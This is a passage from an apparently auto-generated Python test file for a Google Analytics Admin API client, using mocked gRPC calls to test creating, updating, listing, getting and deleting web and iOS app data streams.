assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].web_data_stream == resources.WebDataStream(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_web_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_web_data_stream( analytics_admin.UpdateWebDataStreamRequest(), web_data_stream=resources.WebDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_web_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.WebDataStream() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_web_data_stream( web_data_stream=resources.WebDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. 
assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].web_data_stream == resources.WebDataStream(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_web_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_web_data_stream( analytics_admin.UpdateWebDataStreamRequest(), web_data_stream=resources.WebDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_create_web_data_stream( transport: str = "grpc", request_type=analytics_admin.CreateWebDataStreamRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.WebDataStream( name="name_value", measurement_id="measurement_id_value", firebase_app_id="firebase_app_id_value", default_uri="default_uri_value", display_name="display_name_value", ) response = client.create_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateWebDataStreamRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, resources.WebDataStream) assert response.name == "name_value" assert response.measurement_id == "measurement_id_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.default_uri == "default_uri_value" assert response.display_name == "display_name_value" def test_create_web_data_stream_from_dict(): test_create_web_data_stream(request_type=dict) def test_create_web_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_web_data_stream), "__call__" ) as call: client.create_web_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateWebDataStreamRequest() @pytest.mark.asyncio async def test_create_web_data_stream_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreateWebDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream( name="name_value", measurement_id="measurement_id_value", firebase_app_id="firebase_app_id_value", default_uri="default_uri_value", display_name="display_name_value", ) ) response = await client.create_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateWebDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.WebDataStream) assert response.name == "name_value" assert response.measurement_id == "measurement_id_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.default_uri == "default_uri_value" assert response.display_name == "display_name_value" @pytest.mark.asyncio async def test_create_web_data_stream_async_from_dict(): await test_create_web_data_stream_async(request_type=dict) def test_create_web_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateWebDataStreamRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_web_data_stream), "__call__" ) as call: call.return_value = resources.WebDataStream() client.create_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. 
_, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_create_web_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateWebDataStreamRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_web_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream() ) await client.create_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_create_web_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.WebDataStream() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_web_data_stream( parent="parent_value", web_data_stream=resources.WebDataStream(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].web_data_stream == resources.WebDataStream(name="name_value") def test_create_web_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_web_data_stream( analytics_admin.CreateWebDataStreamRequest(), parent="parent_value", web_data_stream=resources.WebDataStream(name="name_value"), ) @pytest.mark.asyncio async def test_create_web_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.WebDataStream() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_web_data_stream( parent="parent_value", web_data_stream=resources.WebDataStream(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].web_data_stream == resources.WebDataStream(name="name_value") @pytest.mark.asyncio async def test_create_web_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.create_web_data_stream( analytics_admin.CreateWebDataStreamRequest(), parent="parent_value", web_data_stream=resources.WebDataStream(name="name_value"), ) def test_list_web_data_streams( transport: str = "grpc", request_type=analytics_admin.ListWebDataStreamsRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListWebDataStreamsResponse( next_page_token="next_page_token_value", ) response = client.list_web_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListWebDataStreamsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListWebDataStreamsPager) assert response.next_page_token == "next_page_token_value" def test_list_web_data_streams_from_dict(): test_list_web_data_streams(request_type=dict) def test_list_web_data_streams_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: client.list_web_data_streams() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListWebDataStreamsRequest() @pytest.mark.asyncio async def test_list_web_data_streams_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListWebDataStreamsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListWebDataStreamsResponse( next_page_token="next_page_token_value", ) ) response = await client.list_web_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListWebDataStreamsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListWebDataStreamsAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_web_data_streams_async_from_dict(): await test_list_web_data_streams_async(request_type=dict) def test_list_web_data_streams_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. 
request = analytics_admin.ListWebDataStreamsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: call.return_value = analytics_admin.ListWebDataStreamsResponse() client.list_web_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_web_data_streams_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListWebDataStreamsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListWebDataStreamsResponse() ) await client.list_web_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_web_data_streams_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = analytics_admin.ListWebDataStreamsResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_web_data_streams(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_web_data_streams_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_web_data_streams( analytics_admin.ListWebDataStreamsRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_web_data_streams_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListWebDataStreamsResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListWebDataStreamsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_web_data_streams(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_web_data_streams_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.list_web_data_streams( analytics_admin.ListWebDataStreamsRequest(), parent="parent_value", ) def test_list_web_data_streams_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListWebDataStreamsResponse( web_data_streams=[ resources.WebDataStream(), resources.WebDataStream(), resources.WebDataStream(), ], next_page_token="abc", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[], next_page_token="def", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[resources.WebDataStream(),], next_page_token="ghi", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[ resources.WebDataStream(), resources.WebDataStream(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_web_data_streams(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.WebDataStream) for i in results) def test_list_web_data_streams_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListWebDataStreamsResponse( web_data_streams=[ resources.WebDataStream(), resources.WebDataStream(), resources.WebDataStream(), ], next_page_token="abc", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[], next_page_token="def", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[resources.WebDataStream(),], next_page_token="ghi", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[ resources.WebDataStream(), resources.WebDataStream(), ], ), RuntimeError, ) pages = list(client.list_web_data_streams(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_web_data_streams_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListWebDataStreamsResponse( web_data_streams=[ resources.WebDataStream(), resources.WebDataStream(), resources.WebDataStream(), ], next_page_token="abc", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[], next_page_token="def", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[resources.WebDataStream(),], next_page_token="ghi", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[ resources.WebDataStream(), resources.WebDataStream(), ], ), RuntimeError, ) async_pager = await client.list_web_data_streams(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.WebDataStream) for i in responses) @pytest.mark.asyncio async def test_list_web_data_streams_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
        call.side_effect = (
            analytics_admin.ListWebDataStreamsResponse(
                web_data_streams=[
                    resources.WebDataStream(),
                    resources.WebDataStream(),
                    resources.WebDataStream(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.ListWebDataStreamsResponse(
                web_data_streams=[], next_page_token="def",
            ),
            analytics_admin.ListWebDataStreamsResponse(
                web_data_streams=[resources.WebDataStream(),], next_page_token="ghi",
            ),
            analytics_admin.ListWebDataStreamsResponse(
                web_data_streams=[
                    resources.WebDataStream(),
                    resources.WebDataStream(),
                ],
            ),
            RuntimeError,
        )
        pages = []
        async for page_ in (await client.list_web_data_streams(request={})).pages:
            pages.append(page_)
        for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
            assert page_.raw_page.next_page_token == token


def test_get_ios_app_data_stream(
    transport: str = "grpc", request_type=analytics_admin.GetIosAppDataStreamRequest
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_ios_app_data_stream), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.IosAppDataStream(
            name="name_value",
            firebase_app_id="firebase_app_id_value",
            bundle_id="bundle_id_value",
            display_name="display_name_value",
        )
        response = client.get_ios_app_data_stream(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetIosAppDataStreamRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.IosAppDataStream)
    assert response.name == "name_value"
    assert response.firebase_app_id == "firebase_app_id_value"
    assert response.bundle_id == "bundle_id_value"
    assert response.display_name == "display_name_value"


def test_get_ios_app_data_stream_from_dict():
    test_get_ios_app_data_stream(request_type=dict)


def test_get_ios_app_data_stream_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_ios_app_data_stream), "__call__"
    ) as call:
        client.get_ios_app_data_stream()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetIosAppDataStreamRequest()


@pytest.mark.asyncio
async def test_get_ios_app_data_stream_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.GetIosAppDataStreamRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_ios_app_data_stream), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.IosAppDataStream(
                name="name_value",
                firebase_app_id="firebase_app_id_value",
                bundle_id="bundle_id_value",
                display_name="display_name_value",
            )
        )
        response = await client.get_ios_app_data_stream(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.GetIosAppDataStreamRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.IosAppDataStream)
    assert response.name == "name_value"
    assert response.firebase_app_id == "firebase_app_id_value"
    assert response.bundle_id == "bundle_id_value"
    assert response.display_name == "display_name_value"


@pytest.mark.asyncio
async def test_get_ios_app_data_stream_async_from_dict():
    await test_get_ios_app_data_stream_async(request_type=dict)


def test_get_ios_app_data_stream_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetIosAppDataStreamRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_ios_app_data_stream), "__call__"
    ) as call:
        call.return_value = resources.IosAppDataStream()
        client.get_ios_app_data_stream(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_get_ios_app_data_stream_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.GetIosAppDataStreamRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_ios_app_data_stream), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.IosAppDataStream()
        )
        await client.get_ios_app_data_stream(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


def test_get_ios_app_data_stream_flattened():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.get_ios_app_data_stream), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.IosAppDataStream()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.get_ios_app_data_stream(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


def test_get_ios_app_data_stream_flattened_error():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.get_ios_app_data_stream(
            analytics_admin.GetIosAppDataStreamRequest(), name="name_value",
        )


@pytest.mark.asyncio
async def test_get_ios_app_data_stream_flattened_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object( type(client.transport.get_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.IosAppDataStream() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.IosAppDataStream() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_ios_app_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_ios_app_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_ios_app_data_stream( analytics_admin.GetIosAppDataStreamRequest(), name="name_value", ) def test_delete_ios_app_data_stream( transport: str = "grpc", request_type=analytics_admin.DeleteIosAppDataStreamRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_ios_app_data_stream(request) # Establish that the underlying gRPC stub method was called. 
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.DeleteIosAppDataStreamRequest()

    # Establish that the response is the type that we expect.
    assert response is None


def test_delete_ios_app_data_stream_from_dict():
    test_delete_ios_app_data_stream(request_type=dict)


def test_delete_ios_app_data_stream_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_ios_app_data_stream), "__call__"
    ) as call:
        client.delete_ios_app_data_stream()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.DeleteIosAppDataStreamRequest()


@pytest.mark.asyncio
async def test_delete_ios_app_data_stream_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.DeleteIosAppDataStreamRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_ios_app_data_stream), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        response = await client.delete_ios_app_data_stream(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.DeleteIosAppDataStreamRequest()

    # Establish that the response is the type that we expect.
    assert response is None


@pytest.mark.asyncio
async def test_delete_ios_app_data_stream_async_from_dict():
    await test_delete_ios_app_data_stream_async(request_type=dict)


def test_delete_ios_app_data_stream_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.DeleteIosAppDataStreamRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_ios_app_data_stream), "__call__"
    ) as call:
        call.return_value = None
        client.delete_ios_app_data_stream(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_delete_ios_app_data_stream_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.DeleteIosAppDataStreamRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_ios_app_data_stream), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        await client.delete_ios_app_data_stream(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
_, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_ios_app_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_ios_app_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_ios_app_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_ios_app_data_stream( analytics_admin.DeleteIosAppDataStreamRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_ios_app_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_ios_app_data_stream(name="name_value",) # Establish that the underlying 